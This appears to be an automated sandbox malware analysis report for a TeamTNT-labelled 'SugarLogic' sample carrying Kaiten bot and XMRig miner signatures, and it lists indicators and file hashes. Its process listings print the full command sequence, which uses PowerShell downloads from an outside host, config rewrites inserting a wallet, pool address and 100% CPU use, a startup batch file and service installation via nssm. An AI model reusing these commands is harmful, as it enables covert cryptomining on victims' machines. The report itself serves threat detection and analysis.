Analysis Overview
SHA256
317806eaebb1cec9ddb962ef7fa19ee0673a67db3a8c7d650d76885041031ce8
Threat Level: Known bad
The file SugarLogic_#teamtnt_by_@r3dbU7z was found to be: Known bad.
Malicious Activity Summary
Kaiten family
Identified Kaiten Bot
XMRig Miner Payload
xmrig
Xmrig family
XMRig Miner Payload
Blocklisted process makes network request
Stops running service(s)
Executes dropped EXE
Drops startup file
Launches sc.exe
Kills process with taskkill
Enumerates processes with tasklist
Suspicious use of AdjustPrivilegeToken
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-10-29 19:09
Signatures
Identified Kaiten Bot
Kaiten family
XMRig Miner Payload
Xmrig family
Analysis: behavioral4
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
debian9-armhf-en-20211025
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/566148710/payload.dat
[/tmp/566148710/payload.dat]
Network
Files
Analysis: behavioral5
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
ubuntu1804-amd64-en-20211025
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
debian9-armhf-en-20211025
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/128429670/payload.dat
[/tmp/128429670/payload.dat]
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
debian9-mipsel-en-20211025
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/217523984/payload.dat
[/tmp/217523984/payload.dat]
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win10-en-20211014
Max time kernel
123s
Max time network
147s
Command Line
Signatures
xmrig
XMRig Miner Payload
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\moneroocean\xmrig.exe | N/A |
| N/A | N/A | C:\Users\Admin\moneroocean\xmrig.exe | N/A |
Stops running service(s)
Drops startup file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\moneroocean_miner.bat | C:\Windows\system32\cmd.exe | N/A |
Launches sc.exe
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\where.exe
where powershell
C:\Windows\system32\where.exe
where find
C:\Windows\system32\where.exe
where findstr
C:\Windows\system32\where.exe
where tasklist
C:\Windows\system32\timeout.exe
timeout 2
C:\Windows\system32\sc.exe
sc stop moneroocean_miner
C:\Windows\system32\sc.exe
sc delete moneroocean_miner
C:\Windows\system32\taskkill.exe
taskkill /f /t /im xmrig.exe
C:\Windows\system32\timeout.exe
timeout 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Users\Admin\moneroocean\xmrig.exe
"C:\Users\Admin\moneroocean\xmrig.exe" --help
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"94.130.12.27:3333\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"438ss2gYTKze7kMqrgUagwEjtm993CVHk1uKHUBZGy6yPaZ2WNe5vdDFXGoVvtf7wcbiAUJix3NR9Ph1aq2NqSgyBkVFEtZ\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"WinTendo\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
C:\Windows\system32\tasklist.exe
tasklist /fi "imagename eq xmrig.exe"
C:\Windows\system32\find.exe
find ":"
C:\Users\Admin\moneroocean\xmrig.exe
C:\Users\Admin\moneroocean\xmrig.exe --config="C:\Users\Admin\moneroocean\config_background.json"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| DE | 85.214.149.236:443 | 85.214.149.236 | tcp |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 56efdb5a0f10b5eece165de4f8c9d799 |
| SHA1 | fa5de7ca343b018c3bfeab692545eb544c244e16 |
| SHA256 | 6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108 |
| SHA512 | 91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 40ef7db7b590b37dbe14b834480916eb |
| SHA1 | 0b48e0e3631424f46ad5ef8d39d93421e9b9c5b6 |
| SHA256 | 186e56656bb4d26c0866bd16f8737ec01e2c647ea0cc22890caeb12be8cf8e4c |
| SHA512 | 7eb9cc596ce3a720a990e35281eb21570b89951af07d3eb4145c23be1e566cfb02c1df77c26101e5e17acaab1f985ef2e0d8b568ddb52db2a5699ababf1985a1 |
C:\Users\Admin\xmrig.zip
| MD5 | 877492e0bf1e064eef97339fd71990fd |
| SHA1 | 3f4988a2b1ca38850b8798974f01cd76815af684 |
| SHA256 | 17862610ea8190e3ed4d22099d324d9058b15c941ce97236405fc80d3c50d747 |
| SHA512 | 016fec4d0c9c9ad4ec6de82456bc41b1c59cfcf8c13781ce457b939f44a21b91c68decf02c05f39d4646e4480734b592c3c6753750b21836b231ab87e70f973d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0d66cbceb3ec62c57dd66cc0f4282156 |
| SHA1 | f5373d3010118067555c7a4a8ef8817f910b4dfc |
| SHA256 | dc603c5cdd5dd1394df01bcd9279807564149d545d1aca2b4950536dd808f46a |
| SHA512 | dd0a747710e5008f4ac7f5519d40fccb876fcff5ce592f39d25b55d78cf01763cb33a5246afd51f3fdb0518510c7f74eafd424cc1132343957bf3bf74ce1b4d1 |
C:\Users\Admin\moneroocean\config.json
| MD5 | bfa626e053028f9adbfaceb5d56086c3 |
| SHA1 | acf9d3be3211c8f96b823517ea83888982d498d3 |
| SHA256 | c17e1a22b7bc00e591aede9d101b843ff2e47d5b582bb0628406bbd53b7dac78 |
| SHA512 | 692115d964b98f380c0f45a9e25dc3d22bc53447c1aa76732103e7ac1807459c45348d873dcb0eeb92ca38f9a954f27078a8f4a3508ca5b4b3809a92f02765d0 |
C:\Users\Admin\moneroocean\xmrig.exe
| MD5 | 90ba713a657fe704ca05fbcfd967c245 |
| SHA1 | 020c59739d08b12008554ec48af07ec35d12f178 |
| SHA256 | 5ba3e2db02b76821bae00056323810032c0ebc1c54b1c93f383e31b3526ee847 |
| SHA512 | 98c88ffc0909f2bf76c78b46826e2a786f7fe3872f824c7c9e7959987cd5d7b46328b01b526f4431aa047685d5c88fa5172d819d58eed4a457b70e0de023c8d3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fb273c9c89cac500fcbadabed98e3375 |
| SHA1 | e2563ab7ad20b04b1aa62a9aaf4862be800ae2bf |
| SHA256 | bfa054896268067d7d081d4ff4e1731ad8f88ec92e523ff736137ba75977a8d8 |
| SHA512 | ec31170d7279822739a2c45af21df92a32294757bad8bcf3b609e0b489319ad784f706fd1a9db43c9e7a9223b76306420f1a81fdd98fccd856bb62e82d7ddfe1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ba8ae666e929aa64d0504993fba65ee9 |
| SHA1 | 89c35367510d0153cef20bd7d2b31a5470b1e441 |
| SHA256 | 2baa317c75ad71a43c1873cb2931eed865638179d918c790b900e6fb0873624c |
| SHA512 | 2e26fdd7778c15df72c36c9718015d82c6d5c62232f5ea41c11ebf846f84cdc4d48c8c1bce16a76eca995e9c441a7442523b12f794f54f813f347e07beb3be43 |
C:\Users\Admin\moneroocean\config.json
| MD5 | 2a7d154f3f4a62932f80ea0d62776fb1 |
| SHA1 | d8bc14b26073d8da26b3801d5f118c1c2fb9e916 |
| SHA256 | 8c5e3471399b12cd08552ca3608ef57ebfa6da170d82b6d4ee5c95ed06b902d8 |
| SHA512 | 64e50e4e45b1ffcd1f0655816541c55440376c87302ad468ec9111d409d0cb0a5ace31fb9ac90e881694eba7906e19175d23a336b2deb3c881555e4940390c23 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1bcb465bafde8c1434b1561ced728749 |
| SHA1 | 6f08eb9d57100b4876d7346d744fffe928ad6648 |
| SHA256 | 1db46b71c87b1e38dfd7af6d4dc1003122e1e78f2a24863349419ffdf602e034 |
| SHA512 | 773ec8962dc5563351acf67a8e2787ec56dbdbc96c62cebb9cb6fb6319ef62614fe0a3823aa02e82f1b46ed3b8d07e6efdf3eb19df05e22397b7ca552a2fcdfc |
C:\Users\Admin\moneroocean\config.json
| MD5 | 031168b8b85aa1ff67dbe665e3ea9fd1 |
| SHA1 | aa617eab33ad5d776a96bc79ad2c88205ff315b4 |
| SHA256 | d021106b60e81826150b4f5e50969cc66c3781c20faab66b8e795ebf938e7b6f |
| SHA512 | 32d88ac902f0bfc12085c9d77919c2f31d9bcf574cafe5a82f484c4a5e7c3c5676fa7fc3ffb2687c22b183f59ca80a8d178a3651328bf32a2c6e124bd09c1c0d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9a829f9f5ded3f9a1ec326f6a6cab345 |
| SHA1 | 738e6ce9004d7463811ae2ac8000c701736386ba |
| SHA256 | 5348f58a41191272bb3416915d5cd0ef7e8d7333f9c499541439daac6e3a9f31 |
| SHA512 | 88740d927926c36df4f81f9637bcf45f709330fb27b34bac50838ddc28f8e1a95de88c3c7bba66f360727fa337fa3e53c71c0cfed1cf830e6e65b4d27bed8563 |
C:\Users\Admin\moneroocean\config.json
| MD5 | 115d22c264f7912e7d02307386db8c53 |
| SHA1 | fe96e575df30c6c3b4f1c3a331d6641f7061726e |
| SHA256 | 38b5c830e728ac133ac5f8153f48f0e90c74dfdbde73426de2331dde69300c9a |
| SHA512 | 0390fd713b7a413eff753f9ab5e3779cf3c0a59b0dbd701e58bae5be222c3ae846dc0605c4802a1851e1e3f371c0baf28560b5bbf98a4131857ee1e0fb864bd8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6ca7324beb2215be243500bc82290706 |
| SHA1 | 1108f05689bda703ebe065f6dfe9f7bf551b2642 |
| SHA256 | 307f464ddd8139dc577c3cd42248c146c86004f83c215f324e634852311819e5 |
| SHA512 | e15a169632ed6b8745c02af105316acce972c8e9eec1a228492562ba7424e0948692979f7f28b7b536a73a7698c15268c6c260eedd6ea423f757ef1febaeb9d3 |
C:\Users\Admin\moneroocean\config.json
| MD5 | c35b704c05e2018ce71f35b4be6d687b |
| SHA1 | 7771d19d56d23d3d6f38df5c33a2f162c2b07493 |
| SHA256 | 53b163495576feeb58a418e067016223e9bcfaec0e3e2b0a7d6636c5c23b51d7 |
| SHA512 | 7ecfb37d3bf84959b923f9123053456db74016afc36ce29a6a55b5a6e6fe1d6abeff71724d61b1a499f97842fd711c6e2eaa3e7b885541fd3233aff2d2a24191 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8c2b856bb67d0c963bae3a55dabb0c72 |
| SHA1 | b17fe6260d16fe6f764c026974d038c703da767d |
| SHA256 | dc9036fd9085a78a911ecd50f441acb6cc2a2f57f3f87cf434da3915dbe4f820 |
| SHA512 | c102956e405cba3b8bb9750705f19490414012b1a1178344971378c3bc4c64fb933261a43a557d2b0ecc0c2219daed3ac34fa939eeff5ba87b30b30a5f5efd52 |
C:\Users\Admin\moneroocean\config.json
| MD5 | bc60290fa5050425ae4a655f493802aa |
| SHA1 | 42df7d9c1e95a7e86c4652b7688d5ea5f03e2c47 |
| SHA256 | 6d2d16f7f250d2db6686c1db275145944cfefef2bdee67bb263f815e10ca3409 |
| SHA512 | 6eda5175e9dc409ee2ae09a5050d08cb910395ecbb81262fdfcc42adcdb078febabf40b4dab679d003aaf625f1645f616c56e4926d6ff331f797f5c368bab5f7 |
C:\Users\Admin\moneroocean\config.json
| MD5 | 05193fd0a7804c0389d4043816400804 |
| SHA1 | 9dfab5b729c059a690169de942919137643162ff |
| SHA256 | 6ec2240148b44dddc36db5b78aa92636c541940dd0e7ebfdbf209493fc1a2f52 |
| SHA512 | cc7af49aa14fd743c1a927160541934549d508e5042a8b6347986b91dee646fa61ce50b3cc16434bd628b8d005c1936ec9abe46c3370f5f9d9c0f240a3c9b997 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 33ce3bd4c52bd058a32997d140983eb9 |
| SHA1 | 463dbf2a6a11f4f8d51ac7aadc6f03047e65f4f6 |
| SHA256 | bf3647a6aac8b0ca4da842b7825b004c7d01ba7db097abfc2f842568bdba8b8f |
| SHA512 | 38c82103ed33c7ccf6a1773eb36d5838b0b5e7d6289d3a3a69aec2f1b9170f2658399a64fd1d32fb968eb2285ce0f2cc2e9837a940eed6f5ecf7187653ed1539 |
C:\Users\Admin\moneroocean\config_background.json
| MD5 | 05193fd0a7804c0389d4043816400804 |
| SHA1 | 9dfab5b729c059a690169de942919137643162ff |
| SHA256 | 6ec2240148b44dddc36db5b78aa92636c541940dd0e7ebfdbf209493fc1a2f52 |
| SHA512 | cc7af49aa14fd743c1a927160541934549d508e5042a8b6347986b91dee646fa61ce50b3cc16434bd628b8d005c1936ec9abe46c3370f5f9d9c0f240a3c9b997 |
C:\Users\Admin\moneroocean\config_background.json
| MD5 | 8b89a341da7415528c151ae4ab3d851c |
| SHA1 | 2b28ff8a983351ab6c73c61bb6e96135fb9368d2 |
| SHA256 | c5cbb3a890dd0ac355a4b2928d7dfc0448b53800682401457b1144b77d5339f0 |
| SHA512 | 1319cd72fbc51c80a5df03ed7f67f737b1acf59eaae195cde72e5d7d33f93c044c65800467e8e10021ab1881df0e22d6d2ca9661fa51f536d09f8f943d6c96e5 |
Analysis: behavioral29
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
ubuntu1804-amd64-en-20211025
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral31
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:59
Platform
win10-en-20210920
Max time kernel
110s
Max time network
126s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\nssm.exe
"C:\Users\Admin\AppData\Local\Temp\nssm.exe"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
win10-en-20211014
Max time kernel
12s
Max time network
17s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\WinRing0x64.sys.exe
"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\WinRing0x64.sys.exe"
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 19:57
Platform
ubuntu1804-amd64-en-20211025
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral14
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win10-en-20211014
Max time kernel
121s
Max time network
146s
Command Line
Signatures
xmrig
XMRig Miner Payload
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\moneroocean\xmrig.exe | N/A |
| N/A | N/A | C:\Users\Admin\moneroocean\nssm.exe | N/A |
| N/A | N/A | C:\Users\Admin\moneroocean\nssm.exe | N/A |
| N/A | N/A | C:\Users\Admin\moneroocean\nssm.exe | N/A |
| N/A | N/A | C:\Users\Admin\moneroocean\nssm.exe | N/A |
| N/A | N/A | C:\Users\Admin\moneroocean\nssm.exe | N/A |
| N/A | N/A | C:\Users\Admin\moneroocean\nssm.exe | N/A |
| N/A | N/A | C:\Users\Admin\moneroocean\nssm.exe | N/A |
| N/A | N/A | C:\Users\Admin\moneroocean\xmrig.exe | N/A |
Stops running service(s)
Launches sc.exe
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init2.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\where.exe
where powershell
C:\Windows\system32\where.exe
where find
C:\Windows\system32\where.exe
where findstr
C:\Windows\system32\where.exe
where tasklist
C:\Windows\system32\where.exe
where sc
C:\Windows\system32\timeout.exe
timeout 2
C:\Windows\system32\sc.exe
sc stop moneroocean_miner
C:\Windows\system32\sc.exe
sc delete moneroocean_miner
C:\Windows\system32\taskkill.exe
taskkill /f /t /im xmrig.exe
C:\Windows\system32\timeout.exe
timeout 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Users\Admin\moneroocean\xmrig.exe
"C:\Users\Admin\moneroocean\xmrig.exe" --help
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"94.130.12.27:3333\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"438ss2gYTKze7kMqrgUagwEjtm993CVHk1uKHUBZGy6yPaZ2WNe5vdDFXGoVvtf7wcbiAUJix3NR9Ph1aq2NqSgyBkVFEtZ\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"WinTendo\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/nssm.zip' -OutFile 'C:\Users\Admin\nssm.zip'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
C:\Windows\system32\sc.exe
sc stop moneroocean_miner
C:\Windows\system32\sc.exe
sc delete moneroocean_miner
C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\xmrig.exe
"C:\Users\Admin\moneroocean\xmrig.exe"
C:\Windows\system32\timeout.exe
timeout 99999
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| DE | 85.214.149.236:443 | 85.214.149.236 | tcp |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 40.119.148.38:123 | time.windows.com | udp |
| DE | 85.214.149.236:443 | 85.214.149.236 | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 42d4b1d78e6e092af15c7aef34e5cf45 |
| SHA1 | 6cf9d0e674430680f67260194d3185667a2bb77b |
| SHA256 | c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0 |
| SHA512 | d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930 |
memory/3208-154-0x000001D86E280000-0x000001D86E282000-memory.dmp
memory/3208-155-0x000001D86E280000-0x000001D86E282000-memory.dmp
memory/3208-156-0x000001D86E280000-0x000001D86E282000-memory.dmp
memory/3208-157-0x000001D86E280000-0x000001D86E282000-memory.dmp
memory/3208-158-0x000001D86E280000-0x000001D86E282000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4dd2e0b5c77bf985e686e07151ce43a1 |
| SHA1 | 2a42b3bf86a3938f83c59e31cfba914da12a4d41 |
| SHA256 | 0d4897422bc98a3c7a68e8a1cd657000a0b05a80db77097de1b2c3245ceafc7a |
| SHA512 | febe1df7cc323ecd7ca1e53abfc3f51131aece0fc49085e198165733133edb9c2510b6f1e5e0181e1eb92dd70e6b43f2fa88ef0ac0ade4464cc4031fe7696ade |
memory/3208-161-0x000001D86E280000-0x000001D86E282000-memory.dmp
memory/3208-162-0x000001D86E280000-0x000001D86E282000-memory.dmp
memory/3208-163-0x000001D86E280000-0x000001D86E282000-memory.dmp
memory/3208-164-0x000001D86E280000-0x000001D86E282000-memory.dmp
memory/3208-166-0x000001D86E280000-0x000001D86E282000-memory.dmp
memory/3208-182-0x000001D8701B0000-0x000001D8701B1000-memory.dmp
memory/3208-183-0x000001D870210000-0x000001D870211000-memory.dmp
C:\Users\Admin\xmrig.zip
| MD5 | 877492e0bf1e064eef97339fd71990fd |
| SHA1 | 3f4988a2b1ca38850b8798974f01cd76815af684 |
| SHA256 | 17862610ea8190e3ed4d22099d324d9058b15c941ce97236405fc80d3c50d747 |
| SHA512 | 016fec4d0c9c9ad4ec6de82456bc41b1c59cfcf8c13781ce457b939f44a21b91c68decf02c05f39d4646e4480734b592c3c6753750b21836b231ab87e70f973d |
